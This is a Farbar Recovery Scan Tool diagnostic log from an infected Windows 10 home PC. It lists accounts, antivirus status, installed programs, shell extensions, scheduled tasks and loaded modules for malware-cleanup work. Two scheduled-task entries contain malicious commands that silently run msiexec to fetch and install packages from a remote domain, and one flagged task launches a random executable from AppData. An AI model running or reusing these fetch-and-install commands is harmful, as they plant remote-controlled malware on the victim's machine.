Additional scan result of Farbar Recovery Scan Tool (x64) Version: 28.09.2018
Ran by Martin (11-01-2019 19:41:34)
Running from C:\Users\ulol\Desktop
Windows 10 Home Version 1803 17134.523 (X64) (2018-05-21 20:07:15)
Boot Mode: Safe Mode (minimal)
==========================================================


==================== Accounts: =============================

Administrator (S-1-5-21-195099987-321758953-278711717-500 - Administrator - Disabled)
DefaultAccount (S-1-5-21-195099987-321758953-278711717-503 - Limited - Disabled)
defaultuser0 (S-1-5-21-195099987-321758953-278711717-1000 - Limited - Disabled) => C:\Users\defaultuser0
Guest (S-1-5-21-195099987-321758953-278711717-501 - Limited - Disabled)
Martin (S-1-5-21-195099987-321758953-278711717-1001 - Administrator - Enabled) => C:\Users\ulol
WDAGUtilityAccount (S-1-5-21-195099987-321758953-278711717-504 - Limited - Disabled)

==================== Security Center ========================

(If an entry is included in the fixlist, it will be removed.)

AV: adaware antivirus (Enabled - Up to date) {3AF56CA3-CA5A-215C-108D-CECA729D293A}
AV: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: adaware antivirus (Enabled - Up to date) {81948D47-EC60-2ED2-2A3D-F5B8091A6387}
AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}

==================== Installed Programs ======================

(Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)

adaware antivirus (HKLM\...\{E20E59E7-F5E2-4C64-8A32-8679D9D24C91}_AdAwareUpdater) (Version: 12.6.997.11652 - adaware)
AdAwareInstaller (HKLM\...\{D13B7904-0E4D-4375-B4C7-C86C7C15D995}) (Version: 12.6.997.11652 - adaware) Hidden
AdAwareProxyEngine (HKLM\...\{7F7C8AE0-961B-4AED-B99A-D9BE29C0F24C}) (Version: 1.0.0.8 - adaware) Hidden
AdAwareUpdater (HKLM\...\{E20E59E7-F5E2-4C64-8A32-8679D9D24C91}) (Version: 12.6.997.11652 - adaware) Hidden
Adobe Acrobat Reader DC - Czech (HKLM-x32\...\{AC76BA86-7AD7-1029-7B44-AC0F074E4100}) (Version: 19.010.20069 - Adobe Systems Incorporated)
AMD Install Manager (HKLM\...\AMD Catalyst Install Manager) (Version: 5.00 - Advanced Micro Devices, Inc.)
AntimalwareEngine (HKLM\...\{5C7A5F94-02E9-4C5D-A594-B1F10865965A}) (Version: 3.0.160.0 - adaware) Hidden
AntispamEngine (HKLM\...\{7DE129E5-BB4A-4517-A6CD-C69EEB346781}) (Version: 2.5.337.0 - adaware) Hidden
AvcEngine (HKLM\...\{700C79E1-C8E3-454E-B760-CAFFE9F2A6AA}) (Version: 3.22.183.0 - adaware) Hidden
BlueStacks App Player (HKLM-x32\...\BlueStacks) (Version: 2.7.320.8504 - BlueStack Systems, Inc.)
Catalyst Control Center Next Localization BR (HKLM\...\{585A6A74-1DED-8DA0-32F1-F5EFA485DFB1}) (Version: 2016.0226.1531.27895 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization CS (HKLM\...\{2CEBB6AA-EC39-DFF2-1F5B-9A98301C4DAB}) (Version: 2016.0226.1531.27895 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization DA (HKLM\...\{F05F0B6E-9999-55D0-C323-D06DF0E2B59F}) (Version: 2016.0226.1531.27895 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization DE (HKLM\...\{CBABB5FD-BD69-8969-729A-5659E11D9518}) (Version: 2016.0226.1531.27895 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization EL (HKLM\...\{98527BF3-A8E0-B8CF-7297-436B714FC576}) (Version: 2016.0226.1531.27895 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization ES (HKLM\...\{D6CD1B25-53E6-C2F8-FA99-F89138A9C86F}) (Version: 2016.0226.1531.27895 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization FI (HKLM\...\{487C3865-3005-F04A-FBA4-F4239E02A847}) (Version: 2016.0226.1531.27895 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization FR (HKLM\...\{D80AD200-548C-B62B-32AE-BF3CD7AA7EA2}) (Version: 2016.0226.1531.27895 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization HU (HKLM\...\{D21BFF5C-51AA-4C15-1C91-6A1087FDC373}) (Version: 2016.0226.1531.27895 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization CHS (HKLM\...\{A0649E20-C57C-DCFA-AE1B-1CE1CB9D98A8}) (Version: 2016.0226.1531.27895 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization CHT (HKLM\...\{35F79A5D-00E2-8C19-D929-2E85DEA4252D}) (Version: 2016.0226.1531.27895 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization IT (HKLM\...\{04F0FFCB-D9A5-2332-2697-CA47C0424AF2}) (Version: 2016.0226.1531.27895 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization JA (HKLM\...\{47F2FFDC-3D6A-CED6-0B54-6E7082D5B29B}) (Version: 2016.0226.1531.27895 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization KO (HKLM\...\{5608D1B6-6483-9FA3-7297-C2CFC3FCE747}) (Version: 2016.0226.1531.27895 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization NL (HKLM\...\{1FCA484A-5A9E-9C91-F050-257D1F311A0C}) (Version: 2016.0226.1531.27895 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization NO (HKLM\...\{D8FB03AE-A326-0C12-AC47-B898FE73FA94}) (Version: 2016.0226.1531.27895 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization PL (HKLM\...\{F7876D2E-CDCD-CE53-0E88-995B57A94B58}) (Version: 2016.0226.1531.27895 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization RU (HKLM\...\{3BAB5AC8-EF35-FED0-BCEB-9306D05EDE1C}) (Version: 2016.0226.1531.27895 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization SV (HKLM\...\{746E086C-023A-A79C-DBE1-062E773FF6C8}) (Version: 2016.0226.1531.27895 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization TH (HKLM\...\{1C44BB26-1941-DB44-D5E8-C455F89EE6E6}) (Version: 2016.0226.1531.27895 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization TR (HKLM\...\{BE7F26CB-6E91-7673-7130-80C36FBF13DE}) (Version: 2016.0226.1531.27895 - Advanced Micro Devices, Inc.) Hidden
Common Desktop Agent (HKLM\...\{031A0E14-0413-4C97-9772-2639B782F46F}) (Version: 1.62.0 - OEM) Hidden
FirewallEngine (HKLM\...\{232046DA-BB57-4114-9A0D-1119F00C4398}) (Version: 3.0.0.21 - adaware) Hidden
GIMP 2.8.22 (HKLM\...\GIMP-2_is1) (Version: 2.8.22 - The GIMP Team)
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 71.0.3578.98 - Google Inc.)
Google Update Helper (HKLM-x32\...\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}) (Version: 1.3.33.23 - Google Inc.) Hidden
HiSuite (HKLM-x32\...\Hi Suite) (Version: 9.0.2.301 - Huawei Technologies Co.,Ltd)
HitmanPro 3.8 (HKLM\...\HitmanPro38) (Version: 3.8.0.295 - SurfRight B.V.)
Intel(R) Processor Graphics (HKLM-x32\...\{F0E3AD40-2BBD-4360-9C76-B9AC9A5886EA}) (Version: 10.18.10.4653 - Intel Corporation)
IrfanView (remove only) (HKLM-x32\...\IrfanView) (Version:  - )
Kingdom Come Deliverance (HKLM-x32\...\Kingdom Come Deliverance_is1) (Version:  - )
Malwarebytes verze 3.6.1.2711 (HKLM\...\{35065F43-4BB2-439A-BFF7-0F1014F2E0CD}_is1) (Version: 3.6.1.2711 - Malwarebytes)
Microsoft Office 365 ProPlus - cs-cz (HKLM\...\O365ProPlusRetail - cs-cz) (Version: 16.0.9126.2336 - Microsoft Corporation)
Microsoft OneDrive (HKU\S-1-5-21-195099987-321758953-278711717-1001\...\OneDriveSetup.exe) (Version: 18.065.0329.0002 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010  x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010  x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.50727 (HKLM-x32\...\{22154f09-719a-4619-bb71-5b3356999fbf}) (Version: 11.0.50727.1 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.40660 (HKLM-x32\...\{d98165f5-8b37-4100-8852-a0664374ff8a}) (Version: 12.0.40660.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (HKLM-x32\...\{f65db027-aff3-4070-886a-0d87064aabb1}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2015 Redistributable (x64) - 14.0.23026 (HKLM-x32\...\{e46eca4f-393b-40df-9f49-076faf788d83}) (Version: 14.0.23026.0 - Microsoft Corporation)
Microsoft Visual C++ 2015 Redistributable (x86) - 14.0.24215 (HKLM-x32\...\{e2803110-78b3-4664-a479-3611a381656a}) (Version: 14.0.24215.1 - Microsoft Corporation)
MKVToolNix 9.8.0 (64bit) (HKLM-x32\...\MKVToolNix) (Version: 9.8.0 - Moritz Bunkus)
Mozilla Firefox 59.0.2 (x64 en-US) (HKLM\...\Mozilla Firefox 59.0.2 (x64 en-US)) (Version: 59.0.2 - Mozilla)
Mozilla Maintenance Service (HKLM-x32\...\MozillaMaintenanceService) (Version: 59.0.2.6656 - Mozilla)
NetTime (HKLM-x32\...\NetTime_is1) (Version:  - Mark Griffiths)
Office 16 Click-to-Run Extensibility Component (HKLM-x32\...\{90160000-008C-0000-0000-0000000FF1CE}) (Version: 16.0.9126.2336 - Microsoft Corporation) Hidden
Office 16 Click-to-Run Extensibility Component 64-bit Registration (HKLM\...\{90160000-00DD-0000-1000-0000000FF1CE}) (Version: 16.0.9126.2336 - Microsoft Corporation) Hidden
Office 16 Click-to-Run Licensing Component (HKLM\...\{90160000-008F-0000-1000-0000000FF1CE}) (Version: 16.0.9126.2336 - Microsoft Corporation) Hidden
Office 16 Click-to-Run Localization Component (HKLM-x32\...\{90160000-008C-0405-0000-0000000FF1CE}) (Version: 16.0.9126.2336 - Microsoft Corporation) Hidden
OnlineThreatsEngine (HKLM\...\{26F31E12-3722-45FD-903B-49012286BB4C}) (Version: 3.0.1.23 - adaware) Hidden
Port Royale V1.4.0.2 (HKLM-x32\...\Port Royale_is1) (Version:  - )
Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.7535 - Realtek Semiconductor Corp.)
Samsung Easy Document Creator (HKLM-x32\...\Samsung Easy Document Creator) (Version: 1.06.60 (17.03.2015) - Samsung Electronics Co., Ltd.)
Samsung Easy Printer Manager (HKLM-x32\...\Samsung Easy Printer Manager) (Version: 1.05.82.00(27.07.2015) - Samsung Electronics Co., Ltd.)
Samsung Easy Wireless Setup (HKLM-x32\...\Easy Wireless Setup) (Version: 3.70.18.0 - Samsung Electronics Co., Ltd.)
Samsung OCR Software (HKLM-x32\...\Samsung OCR Software) (Version: 1.01.10 (20.06.2014) - Samsung Electronics Co., Ltd.)
Samsung Printer Diagnostics (HKLM-x32\...\Samsung Printer Diagnostics) (Version: 1.0.0.17 - Samsung Electronics Co., Ltd.)
Samsung Printer Live Update (HKLM-x32\...\Samsung Printer Live Update) (Version: 1.01.00:04(2013-04-22) - Samsung Electronics Co., Ltd.)
Samsung Scan Process Machine (HKLM-x32\...\Samsung Scan Process Machine) (Version: 1.03.05.25 - Samsung Electronics Co., Ltd.) Hidden
Samsung SCX-3400 Series (HKLM-x32\...\Samsung SCX-3400 Series) (Version: 1.29 (09.09.2015) - Samsung Electronics Co., Ltd.)
Samsung Universal Scan Driver (HKLM-x32\...\Samsung Universal Scan Driver) (Version: 1.2.19.0 - Samsung Electronics Co., Ltd.)
Skype verze 8.33 (HKLM-x32\...\Skype_is1) (Version: 8.33 - Skype Technologies S.A.)
SMPlayer 17.1.0 (x64) (HKLM\...\SMPlayer) (Version: 17.1.0 - Ricardo Villalba)
SNS Upload for Easy Document Creator (HKLM-x32\...\{B6B5F07C-88D5-49D3-A1A7-A6D4BC37DCCC}) (Version: 1.0.0 - Samsung Electronics Co.,Ltd)
SoftPerfect WiFi Guard version 2.0.2 (HKLM\...\{38AFD787-4D2E-4442-92D2-7739F5F92CF4}_is1) (Version: 2.0.2 - SoftPerfect)
South Park The Fractured But Whole version 1.0 (HKLM\...\South Park The Fractured But Whole_is1) (Version: 1.0 - CODEPUNKS)
Synaptics Pointing Device Driver (HKLM\...\SynTPDeinstKey) (Version: 19.2.1.8 - Synaptics Incorporated)
The Battle for Middle-earth (tm) II (HKLM-x32\...\{2A9F95AB-65A3-432c-8631-B8BC5BF7477A}) (Version:  - )
Uninstall Samsung Printer Software (HKLM-x32\...\TotalUninstaller) (Version: 4.0.0.67 - Samsung Electronics CO., LTD.)
Update for Windows 10 for x64-based Systems (KB4023057) (HKLM\...\{9CBA860F-7437-4A75-941C-8EF559F2D145}) (Version: 2.52.0.0 - Microsoft Corporation)
VLC media player (HKLM\...\VLC media player) (Version: 3.0.4 - VideoLAN)
Winamp (HKLM-x32\...\Winamp) (Version: 5.666  - Nullsoft, Inc)
WinRAR 5.21 (64-bit) (HKLM\...\WinRAR archiver) (Version: 5.21.0 - win.rar GmbH)

==================== Custom CLSID (Whitelisted): ==========================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

CustomCLSID: HKU\S-1-5-21-195099987-321758953-278711717-1001_Classes\CLSID\{820D63D5-8CFF-46DE-86AF-4997DEDD6DB5}\localserver32 -> C:\WINDOWS\system32\igfxEM.exe (Intel Corporation)
ContextMenuHandlers1: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext.dll [2015-02-15] (Alexander Roshal)
ContextMenuHandlers1-x32: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext32.dll [2015-02-15] (Alexander Roshal)
ContextMenuHandlers2: [AdAwareContextMenu] -> {5B64240D-5B36-4B9F-A75F-4925B6A53D5B} => C:\Program Files (x86)\adaware\adaware antivirus\adaware antivirus\12.6.997.11652\AdAwareShellExtension.dll [2018-12-19] ()
ContextMenuHandlers3: [AdAwareContextMenu] -> {5B64240D-5B36-4B9F-A75F-4925B6A53D5B} => C:\Program Files (x86)\adaware\adaware antivirus\adaware antivirus\12.6.997.11652\AdAwareShellExtension.dll [2018-12-19] ()
ContextMenuHandlers3: [MBAMShlExt] -> {57CE581A-0CB6-4266-9CA0-19364C90A0B3} => C:\Program Files\Malwarebytes\Anti-Malware\mbshlext.dll [2018-09-19] (Malwarebytes)
ContextMenuHandlers5: [ACE] -> {5E2121EE-0300-11D4-8D3B-444553540000} => C:\Program Files (x86)\AMD\ATI.ACE\Core-Static\atiacm64.dll [2015-08-04] (Advanced Micro Devices, Inc.)
ContextMenuHandlers5: [igfxcui] -> {3AB1675A-CCFF-11D2-8B20-00A0C93CB1F4} =>  -> No File
ContextMenuHandlers5: [igfxDTCM] -> {9B5F5829-A529-4B12-814A-E81BCB8D93FC} => C:\WINDOWS\system32\igfxDTCM.dll [2017-05-18] (Intel Corporation)
ContextMenuHandlers6: [MBAMShlExt] -> {57CE581A-0CB6-4266-9CA0-19364C90A0B3} => C:\Program Files\Malwarebytes\Anti-Malware\mbshlext.dll [2018-09-19] (Malwarebytes)
ContextMenuHandlers6: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext.dll [2015-02-15] (Alexander Roshal)
ContextMenuHandlers6-x32: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext32.dll [2015-02-15] (Alexander Roshal)

==================== Scheduled Tasks (Whitelisted) =============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

Task: {0273991C-90F1-49BB-A997-73BF1C769F3D} - System32\Tasks\gcknyzn => "msiexec" -package hxxps://superdomain1709.info/ipuaop.nqm /q
Task: {0E14317D-2102-48FC-AAB8-68A9D0B3F691} - System32\Tasks\RTKCPL => C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe [2015-06-24] (Realtek Semiconductor)
Task: {16447E2A-F695-419E-8243-9BF676ECAD36} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentFallBack2016 => C:\Program Files (x86)\Microsoft Office\root\Office16\msoia.exe [2018-12-21] (Microsoft Corporation)
Task: {2208097B-6069-4E4E-B34D-B6C6499D266E} - System32\Tasks\OneDrive Standalone Update Task-S-1-5-21-195099987-321758953-278711717-1001 => C:\Users\ulol\AppData\Local\Microsoft\OneDrive\OneDriveStandaloneUpdater.exe
Task: {23D45486-6328-445F-8E32-ADBAA1F22487} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [2018-08-13] (Adobe Systems Incorporated)
Task: {2BEBB49D-B57F-4F93-8080-66415D045BD2} - System32\Tasks\Microsoft\Office\OfficeBackgroundTaskHandlerRegistration => C:\Program Files (x86)\Microsoft Office\root\Office16\officebackgroundtaskhandler.exe [2018-12-21] (Microsoft Corporation)
Task: {31EC4593-383C-4B64-9941-178C628FAEAF} - System32\Tasks\kuaejfar => "msiexec" /q -package hxxps://superdomain1709.info/qjilljpzujimar.eau
Task: {598F7A69-A348-4C5E-A5CA-F3A37912C800} - System32\Tasks\Microsoft\Office\Office Subscription Maintenance => C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonx86\Microsoft Shared\Office16\OLicenseHeartbeat.exe [2018-12-21] (Microsoft Corporation)
Task: {65B85F6F-35B3-4459-A179-28255D5B7B25} - System32\Tasks\Microsoft\Windows\HelloFace\FODCleanupTask => C:\WINDOWS\System32\WinBioPlugIns\FaceFodUninstaller.exe [2018-04-12] ()
Task: {6A20F2C7-5CF8-4654-BAC1-A87B26620985} - System32\Tasks\AMD Updater => C:\Program Files\AMD\CIM\\Bin64\InstallManagerApp.exe [2016-02-26] (Advanced Micro Devices, Inc.)
Task: {7D591FD9-73EA-4790-8E68-404BAF098DDE} - System32\Tasks\{C1E14D40-9F1F-EBBD-1E08-51865EAFA95A} => C:\Users\ulol\AppData\Roaming\MezyMLATmn.exe [1601-01-03] (Microsoft Corporation) <==== ATTENTION
Task: {90DD05AC-EC80-4EB1-B27B-C21214053600} - System32\Tasks\Microsoft\Office\Office Automatic Updates => C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeC2RClient.exe [2018-12-10] (Microsoft Corporation)
Task: {AD4942CE-F2AB-45E9-A0F7-A0A0696AF497} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentLogOn2016 => C:\Program Files (x86)\Microsoft Office\root\Office16\msoia.exe [2018-12-21] (Microsoft Corporation)
Task: {B0400B46-4EE3-44BE-9C04-F436BEF5665F} - \Microsoft\Windows\UNP\RunCampaignManager -> No File <==== ATTENTION
Task: {C51D1053-58AD-40DC-8AD7-42F044919F19} - System32\Tasks\Microsoft\Office\OfficeBackgroundTaskHandlerLogon => C:\Program Files (x86)\Microsoft Office\root\Office16\officebackgroundtaskhandler.exe [2018-12-21] (Microsoft Corporation)
Task: {C8ED55E2-B8FB-4DD4-8E05-EB726C93E126} - System32\Tasks\Microsoft\Office\Office ClickToRun Service Monitor => C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeC2RClient.exe [2018-12-10] (Microsoft Corporation)

(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)

Task: C:\WINDOWS\Tasks\CreateExplorerShellUnelevatedTask.job => C:\WINDOWS\explorer.exe

==================== Shortcuts & WMI ========================

(The entries could be listed to be restored or removed.)


==================== Loaded Modules (Whitelisted) ==============

2018-12-19 13:11 - 2018-12-19 13:11 - 000587832 _____ () C:\Program Files (x86)\adaware\adaware antivirus\adaware antivirus\12.6.997.11652\AdAwareService.exe
2018-12-19 13:14 - 2018-12-19 13:14 - 000125400 _____ () C:\Program Files (x86)\adaware\adaware antivirus\adaware antivirus\12.6.997.11652\boost_thread-vc140-mt-1_65_1.dll
2018-12-19 13:14 - 2018-12-19 13:14 - 000067544 _____ () C:\Program Files (x86)\adaware\adaware antivirus\adaware antivirus\12.6.997.11652\boost_date_time-vc140-mt-1_65_1.dll
2018-12-19 13:14 - 2018-12-19 13:14 - 000032728 _____ () C:\Program Files (x86)\adaware\adaware antivirus\adaware antivirus\12.6.997.11652\boost_system-vc140-mt-1_65_1.dll
2018-12-19 13:14 - 2018-12-19 13:14 - 000147416 _____ () C:\Program Files (x86)\adaware\adaware antivirus\adaware antivirus\12.6.997.11652\boost_filesystem-vc140-mt-1_65_1.dll
2018-12-19 13:14 - 2018-12-19 13:14 - 000790488 _____ () C:\Program Files (x86)\adaware\adaware antivirus\adaware antivirus\12.6.997.11652\boost_log-vc140-mt-1_65_1.dll
2018-12-19 13:14 - 2018-12-19 13:14 - 000526296 _____ () C:\Program Files (x86)\adaware\adaware antivirus\adaware antivirus\12.6.997.11652\boost_locale-vc140-mt-1_65_1.dll
2018-12-19 13:14 - 2018-12-19 13:14 - 000039896 _____ () C:\Program Files (x86)\adaware\adaware antivirus\adaware antivirus\12.6.997.11652\boost_chrono-vc140-mt-1_65_1.dll
2018-12-19 13:14 - 2018-12-19 13:14 - 011668440 _____ () C:\Program Files (x86)\adaware\adaware antivirus\adaware antivirus\12.6.997.11652\rpc_server.dll
2018-12-19 13:15 - 2018-12-19 13:15 - 003717592 _____ () C:\Program Files (x86)\adaware\adaware antivirus\adaware antivirus\12.6.997.11652\RCF.dll
2018-12-19 13:14 - 2018-12-19 13:14 - 001024472 _____ () C:\Program Files (x86)\adaware\adaware antivirus\adaware antivirus\12.6.997.11652\boost_regex-vc140-mt-1_65_1.dll
2018-12-19 13:14 - 2018-12-19 13:14 - 001251288 _____ () C:\Program Files (x86)\adaware\adaware antivirus\adaware antivirus\12.6.997.11652\AdAwareActivation.dll
2018-12-19 13:14 - 2018-12-19 13:14 - 002940888 _____ () C:\Program Files (x86)\adaware\adaware antivirus\adaware antivirus\12.6.997.11652\AdAwareApplicationUpdater.dll
2018-12-19 13:14 - 2018-12-19 13:14 - 000861656 _____ () C:\Program Files (x86)\adaware\adaware antivirus\adaware antivirus\12.6.997.11652\AdAwareGamingMode.dll
2018-12-19 13:14 - 2018-12-19 13:14 - 000123352 _____ () C:\Program Files (x86)\adaware\adaware antivirus\adaware antivirus\12.6.997.11652\AdAwareReset.dll
2018-12-19 13:14 - 2018-12-19 13:14 - 000145368 _____ () C:\Program Files (x86)\adaware\adaware antivirus\adaware antivirus\12.6.997.11652\AdAwareTime.dll
2018-12-19 13:14 - 2018-12-19 13:14 - 001048024 _____ () C:\Program Files (x86)\adaware\adaware antivirus\adaware antivirus\12.6.997.11652\AdAwareDefinitionsUpdater.dll
2018-12-19 13:14 - 2018-12-19 13:14 - 000926680 _____ () C:\Program Files (x86)\adaware\adaware antivirus\adaware antivirus\12.6.997.11652\AdAwareDefinitionsUpdaterScheduler.dll
2018-12-19 13:14 - 2018-12-19 13:14 - 001466328 _____ () C:\Program Files (x86)\adaware\adaware antivirus\adaware antivirus\12.6.997.11652\AdAwareIgnoreList.dll
2018-12-19 13:14 - 2018-12-19 13:14 - 000312792 _____ () C:\Program Files (x86)\adaware\adaware antivirus\adaware antivirus\12.6.997.11652\AdAwareQuarantine.dll
2018-12-19 13:14 - 2018-12-19 13:14 - 001732568 _____ () C:\Program Files (x86)\adaware\adaware antivirus\adaware antivirus\12.6.997.11652\AdAwareAntiMalwareEngine.dll
2018-12-19 13:14 - 2018-12-19 13:14 - 001229272 _____ () C:\Program Files (x86)\adaware\adaware antivirus\adaware antivirus\12.6.997.11652\AdAwareScannerHistory.dll
2018-12-19 13:14 - 2018-12-19 13:14 - 001574872 _____ () C:\Program Files (x86)\adaware\adaware antivirus\adaware antivirus\12.6.997.11652\AdAwareScanner.dll
2018-12-19 13:14 - 2018-12-19 13:14 - 000039384 _____ () C:\Program Files (x86)\adaware\adaware antivirus\adaware antivirus\12.6.997.11652\boost_timer-vc140-mt-1_65_1.dll
2018-12-19 13:14 - 2018-12-19 13:14 - 001052632 _____ () C:\Program Files (x86)\adaware\adaware antivirus\adaware antivirus\12.6.997.11652\AdAwareScannerScheduler.dll
2018-12-19 13:14 - 2018-12-19 13:14 - 001195992 _____ () C:\Program Files (x86)\adaware\adaware antivirus\adaware antivirus\12.6.997.11652\AdAwareRealTimeProtection.dll
2018-12-19 13:14 - 2018-12-19 13:14 - 003639256 _____ () C:\Program Files (x86)\adaware\adaware antivirus\adaware antivirus\12.6.997.11652\AdAwareIncompatibles.dll
2018-12-19 13:14 - 2018-12-19 13:14 - 001598424 _____ () C:\Program Files (x86)\adaware\adaware antivirus\adaware antivirus\12.6.997.11652\AdAwareAntiSpam.dll
2018-12-19 13:14 - 2018-12-19 13:14 - 001531864 _____ () C:\Program Files (x86)\adaware\adaware antivirus\adaware antivirus\12.6.997.11652\AdAwareAntiPhishing.dll
2018-12-19 13:14 - 2018-12-19 13:14 - 003574232 _____ () C:\Program Files (x86)\adaware\adaware antivirus\adaware antivirus\12.6.997.11652\AdAwareParentalControl.dll
2018-12-19 13:14 - 2018-12-19 13:14 - 003656152 _____ () C:\Program Files (x86)\adaware\adaware antivirus\adaware antivirus\12.6.997.11652\AdAwareWebProtection.dll
2018-12-19 13:14 - 2018-12-19 13:14 - 001683416 _____ () C:\Program Files (x86)\adaware\adaware antivirus\adaware antivirus\12.6.997.11652\AdAwareEmailProtection.dll
2018-12-19 13:14 - 2018-12-19 13:14 - 000072664 _____ () C:\Program Files (x86)\adaware\adaware antivirus\adaware antivirus\12.6.997.11652\boost_iostreams-vc140-mt-1_65_1.dll
2018-12-19 13:14 - 2018-12-19 13:14 - 001789912 _____ () C:\Program Files (x86)\adaware\adaware antivirus\adaware antivirus\12.6.997.11652\AdAwareNetworkProtection.dll
2018-12-19 13:14 - 2018-12-19 13:14 - 003432408 _____ () C:\Program Files (x86)\adaware\adaware antivirus\adaware antivirus\12.6.997.11652\AdAwarePromo.dll
2018-12-19 13:14 - 2018-12-19 13:14 - 000479192 _____ () C:\Program Files (x86)\adaware\adaware antivirus\adaware antivirus\12.6.997.11652\AdAwareFeedback.dll
2018-12-19 13:14 - 2018-12-19 13:14 - 003230168 _____ () C:\Program Files (x86)\adaware\adaware antivirus\adaware antivirus\12.6.997.11652\AdAwareThreatWorkAlliance.dll
2018-12-19 13:14 - 2018-12-19 13:14 - 000720344 _____ () C:\Program Files (x86)\adaware\adaware antivirus\adaware antivirus\12.6.997.11652\AdAwarePinCode.dll
2018-12-19 13:14 - 2018-12-19 13:14 - 001221592 _____ () C:\Program Files (x86)\adaware\adaware antivirus\adaware antivirus\12.6.997.11652\AdAwareNotice.dll
2018-12-19 13:14 - 2018-12-19 13:14 - 001675224 _____ () C:\Program Files (x86)\adaware\adaware antivirus\adaware antivirus\12.6.997.11652\AdAwareAvcEngine.dll
2018-12-19 13:14 - 2018-12-19 13:14 - 001494488 _____ () C:\Program Files (x86)\adaware\adaware antivirus\adaware antivirus\12.6.997.11652\AdAwareRealTimeProtectionHistory.dll
2018-12-19 13:14 - 2018-12-19 13:14 - 000845272 _____ () C:\Program Files (x86)\adaware\adaware antivirus\adaware antivirus\12.6.997.11652\AdAwareStatistics.dll
2019-01-11 14:41 - 2019-01-11 14:41 - 000994752 _____ () C:\Program Files (x86)\adaware\adaware antivirus\Online Threats Engine\definitions\loc2\ashttpbr.mdl
2019-01-11 14:41 - 2019-01-11 14:41 - 000544880 _____ () C:\Program Files (x86)\adaware\adaware antivirus\Online Threats Engine\definitions\loc2\ashttpdsp.mdl
2019-01-11 14:41 - 2019-01-11 14:41 - 003240080 _____ () C:\Program Files (x86)\adaware\adaware antivirus\Online Threats Engine\definitions\loc2\ashttpph.mdl
2019-01-11 14:41 - 2019-01-11 14:41 - 001530368 _____ () C:\Program Files (x86)\adaware\adaware antivirus\Online Threats Engine\definitions\loc2\ashttprbl.mdl
2019-01-10 17:53 - 2018-11-15 11:01 - 002712432 _____ () C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\SelfProtectionSdk.dll
2018-04-12 00:34 - 2018-04-12 00:34 - 000491744 _____ () C:\Windows\System32\InputHost.dll
